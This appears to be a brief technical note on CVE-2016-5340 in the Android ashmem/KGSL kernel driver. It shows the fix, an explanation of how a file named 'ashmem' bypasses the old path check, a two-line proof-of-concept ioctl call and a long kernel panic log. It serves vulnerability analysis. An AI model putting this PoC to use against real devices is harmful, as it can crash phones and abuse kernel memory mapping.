CVE-2016-5340

patch

1
2
3
4
5
6
7
 static int is_ashmem_file(struct file *file)
{

- char fname[256], *name;
- name = dentry_path(file->f_dentry, fname, 256);
- return strcmp(name, "/ashmem") ? 0 : 1;
+ return (file->f_op == &ashmem_fops);
}

dentry_path: 获取文件全路径,相对挂载点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0

so:


data, system, proc, /mnt/obb
/data/ashmem : /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem

poc

1
2
fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[ 269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[ 269.003276] pgd = e9f24000
[ 269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[ 269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[ 269.020398] CPU: 0 Not tainted (3.4.0-gd59db4e #1)
[ 269.020506] PC is at get_ashmem_file+0x78/0x154
[ 269.020676] LR is at is_ashmem_file+0x3c/0x68
[ 269.020772] pc : [<c078e704>] lr : [<c078df24>] psr: 20000013
[ 269.020776] sp : eb73ddb8 ip : eb73dc98 fp : eb73de1c
[ 269.021027] r10: 00000004 r9 : c10e9008 r8 : eb73de5c
[ 269.021196] r7 : eb73de58 r6 : eb73de54 r5 : c103a488 r4 : ebbc9240
[ 269.021291] r3 : 19761abc r2 : 00000000 r1 : c0deb698 r0 : 00000000
[ 269.021464] Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 269.021560] Control: 10c5787d Table: 3232406a DAC: 00000015
[ 269.021729]
[ 269.021731] PC: 0xc078e684:
[ 269.021906] e684 c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[ 269.022856] e6a4 e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[ 269.023810] e6c4 e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[ 269.024684] e6e4 1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[ 269.025645] e704 e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[ 269.026609] e724 e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[ 269.027563] e744 e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[ 269.028451] e764 e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[ 269.029408]
[ 269.029411] LR: 0xc078dea4:
[ 269.029585] dea4 e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[ 269.030541] dec4 e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[ 269.031501] dee4 e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[ 269.032466] df04 e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[ 269.033348] df24 e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[ 269.034303] df44 ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[ 269.035262] df64 e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[ 269.036153] df84 e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[ 269.037106]
[ 269.037108] SP: 0xeb73dd38:
[ 269.037357] dd38 ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[ 269.038229] dd58 c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[ 269.039179] dd78 00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[ 269.040129] dd98 00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[ 269.041004] ddb8 000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[ 269.041953] ddd8 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[ 269.042829] ddf8 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[ 269.043775] de18 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[ 269.044652]
[ 269.044654] IP: 0xeb73dc18:
[ 269.044901] dc18 ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[ 269.045780] dc38 00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[ 269.046749] dc58 eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[ 269.047633] dc78 eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[ 269.048594] dc98 00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[ 269.049476] dcb8 00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[ 269.050434] dcd8 c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[ 269.051397] dcf8 eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[ 269.052351]
[ 269.052353] FP: 0xeb73dd9c:
[ 269.052527] dd9c eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[ 269.053480] ddbc c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[ 269.054363] dddc c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[ 269.055324] ddfc ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[ 269.056282] de1c c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[ 269.057240] de3c ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[ 269.058119] de5c 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[ 269.059070] de7c bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[ 269.060026]
[ 269.060029] R1: 0xc0deb618:
[ 269.060202] b618 613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[ 269.061160] b638 002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[ 269.062118] b658 6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[ 269.063000] b678 613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[ 269.063958] b698 613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[ 269.064909] b6b8 66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[ 269.065797] b6d8 73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[ 269.066754] b6f8 66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[ 269.067710]
[ 269.067713] R4: 0xebbc91c0:
[ 269.067888] 91c0 00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[ 269.068842] 91e0 00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[ 269.069803] 9200 ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[ 269.070680] 9220 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.071635] 9240 ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[ 269.072584] 9260 00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.073465] 9280 00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[ 269.074334] 92a0 00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[ 269.075298]
[ 269.075301] R5: 0xc103a408:
[ 269.075477] a408 0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[ 269.076437] a428 31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[ 269.077396] a448 a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[ 269.078270] a468 db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[ 269.079152] a488 19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[ 269.080109] a4a8 c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[ 269.081061] a4c8 c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[ 269.082008] a4e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.082886]
[ 269.082888] R6: 0xeb73ddd4:
[ 269.083137] ddd4 c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[ 269.084019] ddf4 eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[ 269.084972] de14 eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[ 269.085926] de34 14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[ 269.086876] de54 ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[ 269.087752] de74 c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[ 269.088711] de94 00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[ 269.089669] deb4 00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[ 269.090551]
[ 269.090554] R7: 0xeb73ddd8:
[ 269.090803] ddd8 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[ 269.091762] ddf8 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[ 269.092645] de18 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[ 269.093604] de38 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[ 269.094559] de58 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[ 269.095443] de78 eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[ 269.096406] de98 00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[ 269.097364] deb8 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[ 269.098314]
[ 269.098316] R8: 0xeb73dddc:
[ 269.098492] dddc c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[ 269.099442] ddfc ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[ 269.100320] de1c c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[ 269.101272] de3c ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[ 269.102229] de5c 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[ 269.103183] de7c bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[ 269.104066] de9c 00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[ 269.105015] debc eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[ 269.105967]
[ 269.105969] R9: 0xc10e8f88:
[ 269.106145] 8f88 0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[ 269.107094] 8fa8 c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[ 269.108046] 8fc8 c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[ 269.108925] 8fe8 0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[ 269.109881] 9008 c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[ 269.110837] 9028 c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[ 269.111798] 9048 000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[ 269.112684] 9068 c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[ 269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[ 269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[ 269.113841] dda0: 000080d0 c04aad10
[ 269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[ 269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[ 269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[ 269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[ 269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[ 269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[ 269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[ 269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[ 269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[ 269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[ 269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[ 269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[ 269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[ 269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[ 269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[ 269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[ 269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[ 269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[ 269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[ 269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[ 269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[ 269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[ 269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[ 269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[ 269.121735] ---[ end trace 032dae055767b39f ]---
[ 269.121877] Kernel panic - not syncing: Fatal exception
[ 270.122308] Rebooting in 5 seconds..
[ 275.123947] Going down for restart now
[ 275.124870] Calling SCM to disable SPMI PMIC arbiter